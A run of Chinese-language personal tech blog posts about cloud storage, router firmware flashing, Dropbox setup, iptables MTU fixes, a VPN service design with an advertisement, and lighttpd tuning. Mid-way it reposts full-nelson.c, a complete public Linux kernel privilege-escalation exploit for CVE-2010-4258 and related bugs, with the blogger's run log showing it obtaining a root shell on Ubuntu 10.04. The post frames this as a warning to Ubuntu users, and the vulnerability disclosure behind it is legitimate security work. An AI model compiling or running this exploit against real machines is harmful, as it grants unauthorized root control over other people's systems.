而Amazon cloud drive目前只提供了web的管理界面。也就是说，上传/下载文件必须通过浏览器。这对于用惯了Dropbox到同学来说简直就是一场噩梦。于是，开始寻找第三方同步工具。

非常可惜，Google了一大圈，没有发现任何在linux上可运行的第三方同步工具。上Amazon到官方论坛寻找答案，有位好同学给出了原因：

I read “Amazon Cloud Drive: Terms of Use”, and regreted that a pleasant hack can’t be continued. I’m also awaiting for official APIs, so I gave up developing 3rd-party library…
http://www.amazon.com/gp/help/customer/display.html/?nodeId=200557360

6. Software

you may not … (f) modify, reverse engineer, decompile or disassemble, or otherwise tamper with, the Software, whether in whole or in part, or create any derivative works from or of the Software.

在官方API没有开放到情况下，这就是断绝了第三方同步软件的存在阿….Amazon到底怎么想的？

我搜集的百家講壇的mp3原本大多來自verycd。因為是“講”壇，所以絕大部分時候是無需下載視頻節目的。那麼這裡有個更好的選擇：http://www.baijiajiangtan.org/

大概是這個管理員從視頻中提取了mp3吧，反正很方便我這樣的“專業”聽眾下載。

美中不足的是，從這個網站獲取mp3的步驟很繁瑣。從選擇節目，到點擊mp3的下載鏈接至少要3步。偉大的人類無法適應機械運動啊….so,為了自己方便，用python寫了個小爬蟲，專門獲取這個網站MP3文件的下載路徑，並存入文件。

用法很簡單,將需要下載的節目主題丟給程序，程序會輸出一個文本文件，其中包含了此節目所有的mp3文件路徑。然後麼，就是丟個各種下載軟件處理了。

是以為記。

（下載程序暫時就不公開放出了。一來是自己代碼寫的奇爛；二來麼，人家網站也要活,大夥都用程序去爬的話…..有需要的同學私下向我索取吧）

做個記錄吧，沒準將來還用的到：

1.去原廠下載原版rom (我的是http://www.tplink.com.cn/)

2.telnet 到DDWRT，用wget下載剛剛下載的rom

telnet 192.168.1.1

cd /tmp   #進入臨時文件夾

wget http://192.168.1.100/xxxxx.bin # 192.168.1.100是我的電腦，xxxxx.bin是rom文件

3. 寫入！

mtd -r write xxxxx.bin linux #-r 和 linux參數不可少。-r的意思是寫完rom就重啟

看來有時間可以搗鼓些好玩的東東丟服務器上了。

blog大搬家，自然不會忘記備份。Dropbox已經是不可缺少的武器了。

和去年相比，console模式的Dropbox安裝簡單了不少。

唯一需要注意的是：安裝完成需要關閉Lan Synchronize模式。

很遺憾，官網提供的dropbox_set_lansync.py在我這水土不服。

解決之道也很簡單：

sqlite3 ~/.dropbox/config.db ‘REPLACE INTO config (key,value) VALUES (“p2p_enabled”,0)’

Hi all,

I’ve included here a proof-of-concept local privilege escalation exploit
for Linux. Please read the header for an explanation of what’s going
on. Without further ado, I present full-nelson.c:

Happy hacking,
Dan

/*
 * Linux Kernel <= 2.6.37 local privilege escalation
 * by Dan Rosenberg
 * @djrbliss on twitter
 *
 * Usage:
 * gcc full-nelson.c -o full-nelson
 * ./full-nelson
 *
 * This exploit leverages three vulnerabilities to get root, all of which were
 * discovered by Nelson Elhage:
 *
 * CVE-2010-4258
 * -------------
 * This is the interesting one, and the reason I wrote this exploit.  If a
 * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
 * word will be written to a user-specified pointer when that thread exits.
 * This write is done using put_user(), which ensures the provided destination
 * resides in valid userspace by invoking access_ok().  However, Nelson
 * discovered that when the kernel performs an address limit override via
 * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
 * etc.), this override is not reverted before calling put_user() in the exit
 * path, allowing a user to write a NULL word to an arbitrary kernel address.
 * Note that this issue requires an additional vulnerability to trigger.
 *
 * CVE-2010-3849
 * -------------
 * This is a NULL pointer dereference in the Econet protocol.  By itself, it's
 * fairly benign as a local denial-of-service.  It's a perfect candidate to
 * trigger the above issue, since it's reachable via sock_no_sendpage(), which
 * subsequently calls sendmsg under KERNEL_DS.
 *
 * CVE-2010-3850
 * -------------
 * I wouldn't be able to reach the NULL pointer dereference and trigger the
 * OOPS if users weren't able to assign Econet addresses to arbitrary
 * interfaces due to a missing capabilities check.
 *
 * In the interest of public safety, this exploit was specifically designed to
 * be limited:
 *
 *  * The particular symbols I resolve are not exported on Slackware or Debian
 *  * Red Hat does not support Econet by default
 *  * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
 *    Debian
 *
 * However, the important issue, CVE-2010-4258, affects everyone, and it would
 * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
 * more sophisticated version of this that doesn't have the roadblocks I put in
 * to prevent abuse by script kiddies.
 *
 * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
 *
 * NOTE: the exploit process will deadlock and stay in a zombie state after you
 * exit your root shell because the Econet thread OOPSes while holding the
 * Econet mutex.  It wouldn't be too hard to fix this up, but I didn't bother.
 *
 * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
 */

#include <stdio.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <string.h>
#include <net/if.h>
#include <sched.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/utsname.h>
#include <sys/mman.h>
#include <unistd.h>

/* How many bytes should we clear in our
 * function pointer to put it into userspace? */
#ifdef __x86_64__
#define SHIFT 24
#define OFFSET 3
#else
#define SHIFT 8
#define OFFSET 1
#endif

/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
	FILE *f;
	unsigned long addr;
	char dummy;
	char sname[512];
	struct utsname ver;
	int ret;
	int rep = 0;
	int oldstyle = 0;

	f = fopen("/proc/kallsyms", "r");
	if (f == NULL) {
		f = fopen("/proc/ksyms", "r");
		if (f == NULL)
			goto fallback;
		oldstyle = 1;
	}

repeat:
	ret = 0;
	while(ret != EOF) {
		if (!oldstyle)
			ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
		else {
			ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
			if (ret == 2) {
				char *p;
				if (strstr(sname, "_O/") || strstr(sname, "_S."))
					continue;
				p = strrchr(sname, '_');
				if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
					p = p - 4;
					while (p > (char *)sname && *(p - 1) == '_')
						p--;
					*p = '\0';
				}
			}
		}
		if (ret == 0) {
			fscanf(f, "%s\n", sname);
			continue;
		}
		if (!strcmp(name, sname)) {
			fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
			fclose(f);
			return addr;
		}
	}

	fclose(f);
	if (rep)
		return 0;
fallback:
	uname(&ver);
	if (strncmp(ver.release, "2.6", 3))
		oldstyle = 1;
	sprintf(sname, "/boot/System.map-%s", ver.release);
	f = fopen(sname, "r");
	if (f == NULL)
		return 0;
	rep = 1;
	goto repeat;
}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

static int __attribute__((regparm(3)))
getroot(void * file, void * vma)
{

        commit_creds(prepare_kernel_cred(0));
        return -1;

}

/* Why do I do this?  Because on x86-64, the address of
 * commit_creds and prepare_kernel_cred are loaded relative
 * to rip, which means I can't just copy the above payload
 * into my landing area. */
void __attribute__((regparm(3)))
trampoline()
{

#ifdef __x86_64__
	asm("mov $getroot, %rax; call *%rax;");
#else
	asm("mov $getroot, %eax; call *%eax;");
#endif

}

/* Triggers a NULL pointer dereference in econet_sendmsg
 * via sock_no_sendpage, so it's under KERNEL_DS */
int trigger(int * fildes)
{
	int ret;
	struct ifreq ifr;

	memset(&ifr, 0, sizeof(ifr));
	strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);

	ret = ioctl(fildes[2], SIOCSIFADDR, &ifr);

	if(ret < 0) {
		printf("[*] Failed to set Econet address.\n");
		return -1;
	}

	splice(fildes[3], NULL, fildes[1], NULL, 128, 0);
	splice(fildes[0], NULL, fildes[2], NULL, 128, 0);

	/* Shouldn't get here... */
	exit(0);
}

int main(int argc, char * argv[])
{
	unsigned long econet_ops, econet_ioctl, target, landing;
	int fildes[4], pid;
	void * newstack, * payload;

	/* Create file descriptors now so there are two
	   references to them after cloning...otherwise
	   the child will never return because it
	   deadlocks when trying to unlock various
	   mutexes after OOPSing */
	pipe(fildes);
	fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);
	fildes[3] = open("/dev/zero", O_RDONLY);

	if(fildes[0] < 0 || fildes[1] < 0 || fildes[2] < 0 || fildes[3] < 0) {
		printf("[*] Failed to open file descriptors.\n");
		return -1;
	}

	/* Resolve addresses of relevant symbols */
	printf("[*] Resolving kernel addresses...\n");
	econet_ioctl = get_kernel_sym("econet_ioctl");
	econet_ops = get_kernel_sym("econet_ops");
	commit_creds = (_commit_creds) get_kernel_sym("commit_creds");
	prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");

	if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || !econet_ops) {
		printf("[*] Failed to resolve kernel symbols.\n");
		return -1;
	}

	if(!(newstack = malloc(65536))) {
		printf("[*] Failed to allocate memory.\n");
		return -1;
	}

	printf("[*] Calculating target...\n");
	target = econet_ops + 10 * sizeof(void *) - OFFSET;

	/* Clear the higher bits */
	landing = econet_ioctl << SHIFT >> SHIFT;

	payload = mmap((void *)(landing & ~0xfff), 2 * 4096,
		       PROT_READ | PROT_WRITE | PROT_EXEC,
		       MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);

	if ((long)payload == -1) {
		printf("[*] Failed to mmap() at target address.\n");
		return -1;
	}

	memcpy((void *)landing, &trampoline, 1024);

	clone((int (*)(void *))trigger,
	      (void *)((unsigned long)newstack + 65536),
	      CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,
	      &fildes, NULL, NULL, target);

	sleep(1);

	printf("[*] Triggering payload...\n");
	ioctl(fildes[2], 0, NULL);

	if(getuid()) {
		printf("[*] Exploit failed to get root.\n");
		return -1;
	}

	printf("[*] Got root!\n");
	execl("/bin/sh", "/bin/sh", NULL);
}

Ubuntu 10.04 Server LTS 上测试通过：

$ sudo apt-get update
$ sudo apt-get upgrade

$ uname -r
2.6.32-21-server

$ gcc full-nelson.c -o full-nelson
$ ./full-nelson
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xffffffffa0131510
[+] Resolved econet_ops to 0xffffffffa0131600
[+] Resolved commit_creds to 0xffffffff8108b820
[+] Resolved prepare_kernel_cred to 0xffffffff8108bc00
[*] Calculating target...
[*] Failed to set Econet address.
[*] Triggering payload...
[*] Got root!

在CentOS上測試未成功，因為centos/rhel缺省狀態是不打開econet的。



# yum update

$ uname -r
2.6.18-194.26.1.el5

$ gcc full-nelson.c -o full-nelson
$ ./full-nelson
[*] Failed to open file descriptors.

用Ubuntu的同學們要小心了。

這幾天，作為網關（網閘）的服務器一切運行正常。古怪的是，網關後的電腦（一般就是我們辦公用的）無法打開某些特定的網站。

開始是以為這些無法打開的網站屏蔽了公司總出口的ip。但別的部門卻一切正常，看來也不是ip的問題。
更奇怪的是，在這台dell網關服務器上，可以直接打開這些網站，偏偏網關後的機器不行。看來問題在服務器的設定上。

請教了其他部門的同事後，才知道，可能和我們接入路由器有關：我們路由器設定有問題。其設定的 MTU 大小可能不會讓超過特定大小的封包通過。

很明顯，我沒權限能力去修改上級路由器的mtu數值，那麼，就修改dell服務器的mtu把：

iptables -A FORWARD -s 192.168.165.0/24 -p tcp -m tcp --tcp-flags FIN,SYN,RST,ACK SYN -j TCPMSS --set-mss 15560 //這是內網
iptables -A FORWARD -s 192.168.176.0/24 -p tcp -m tcp --tcp-flags FIN,SYN,RST,ACK SYN -j TCPMSS --set-mss 1356 //這是vpn撥入


ok！問題解決！

啥時候我們的上級能真正花點錢在這些基本設施上呢？據我所知，那個路由器應該還是我大學時候，我沒進公司的時候的破爛貨…

一.VPN的简介

VPN是Virtual Private Network的缩写。简单的说vpn是一种加密的隧道技术。其功能是在两个已经建立连接的主机之间，建立虚拟的加密连接。这也是其名称的来由。

二.系统架构（配图）

2.1 vpn拨入端

Linux常见比较常见的vpn实现有3种：

• OpenVPN
• L2TP/IPSEC VPN
• PPTP VPN

这3种VPN在开源领域都有比较简单便捷便于安装的软件包：

OpenVPN: openvpn.net
PPTP VPN: www.poptop.org
L2TP/Ipsec VPN : http://www.openswan.org/ or http://www.strongswan.org/

需要说明的是，以上几种vpn软件还依赖某些未列出的开源软件。比如：Openvpn/openswan/strongswan需要openssl支持；PPTP vpn需要内核支持MPPE。

2.2 登录认证/计费

因为牵涉到vpn用户的管理，所以，我们加入freeradius.

简单的说，freeradius提供符合RFC标准的的用户认证/管理/计费功能。

利用radius另外一个好处就是，如果vpn服务器需要扩容，那么简单的增加一台vpn接入服务器，并挂接至radius服务器做认证即可。

2.3 数据库/用户管理的web界面

幸运的是，freeradius支持mysql。这意味着我们的用户数据（包括认证/计费等）将可以由开源世界的另外两位常客：apache/php 管理。

至此，全部利用开源软件搭建而成的可管理，可扩充的VPN系统已经全部完成。

2.4 系统结构图

三.优点/缺点

优点：

3.1性价比非常好。

除了租赁服务器和带宽的费用，软件部分全部利用开源软件。没有为购买License支付1分钱。而Google解决了我在设定过程中的所有问题。

3.2 稳定性非常好。

我们的vpn接入服务器，从去年12月底运行以来，除了今年年头（1月1日，印象深刻，死党从被窝抓起来 -_-!）因为he.net和联通线路抽风的几天，我们的vpn接入部分一直处于无人搭理的状态。至今稳定运行。

3.3 通用性非常好。

pptp vpn的客户端遍地都是，基本上所有的桌面操作系统都有pptp拨号器。即便移动设备，现在大部分也支持pptp vpn(iphone/ipod/android/WM 系列)

openvpn 除了移动设备支持较少以外，(android可以参考 yegle的 这篇 和 Virushuo的 这篇) win/osx/linx都有客户端支持(开源的好处呀)

l2tp/ipsec 虽然用的不多，但linux/win/osx肯定是支持的。移动设备上，至少iphone是完全支持的。

缺点：您需要一定的linux知识/耐心/时间解决安装设定中的各种问题。

四.案例

本人blog所提供的vpn，即是按照以上思路搭建vpn服务器群。

最后，插播广告：

VPN账户出售中，去https://www.windhunter.net/members/ 注册后，点击“申请试用”链接 即可获得1小时试用时间。

1.打开compress和expire模块

server.modules = (
...
"mod_compress",
"mod_expire",
...
)


2.优化参数

server.event-handler = "linux-sysepoll"
server.stat-cache-engine = "simple"
server.network-backend = "linux-sendfile"
server.max-keep-alive-requests = 4
server.max-keep-alive-idle=4
server.tag="Apache 2.4"
server.max-fds=2048


【完】

10点多，xrspook同学短信到了，说服务器连不上。web/ssh/vpn都是如此。赶紧检查服务器，丢了份ticket给服务商。10分钟后，有回应了：
（还不错，米国时间夜里2点半，居然还有值班人员。）


Thank you for providing that information, I have forwarded it to our upstream provider for further investigation. We thank you for your continued patience with this matter, please do not hesitate to update this ticket with any questions or concerns you may have in the meantime.

原来是上一级的线路出现问题，故障和服务器完全无关。

12：13分，线路终于恢复了。

可是，我的dropbox依旧没动静。ssh上服务器，重新启动dropbox进程，出现了如下错误：

/usr/local/.dropbox-dist-new/dropbox: /lib64/ld-linux-x86-64.so.2: bad ELF interpreter: No such file or directory

奇怪….我安装dropbox的文件夹明明是.dropbox-dist。联想到到Windows版本的dropbox最近有个升级；而这里的文件夹名称变为.dropbox-dist-new。严重怀疑是dropbox瞒着俺偷偷把自己升级了了；怀疑运行错误的故障和此次自动升级有关。

上dropbox网站看了下，果然2月25号有个升级。ok，干掉错误的自动升级，手动升级：

$ /etc/init.d/dropbox stop #先停掉dropbox服务
$ cd /usr/local
$ rm -rf .dropbox-dist
$ rm -rf .dropbox-dist-new


下载新版本

$ wget http://dl-web.dropbox.com/u/17/dropbox-lnx.x86-0.7.110.tar.gz

注意这里是32位版本，64位版本是http://dl-web.dropbox.com/u/17/dropbox-lnx.x86_64-0.7.110.tar.gz
解解包即可：

$ tar xzf dropbox-lnx.x86-0.7.110.tar.gz

重新运行dropbox后一切正常。

看来dropbox的自动升级还是不够智能.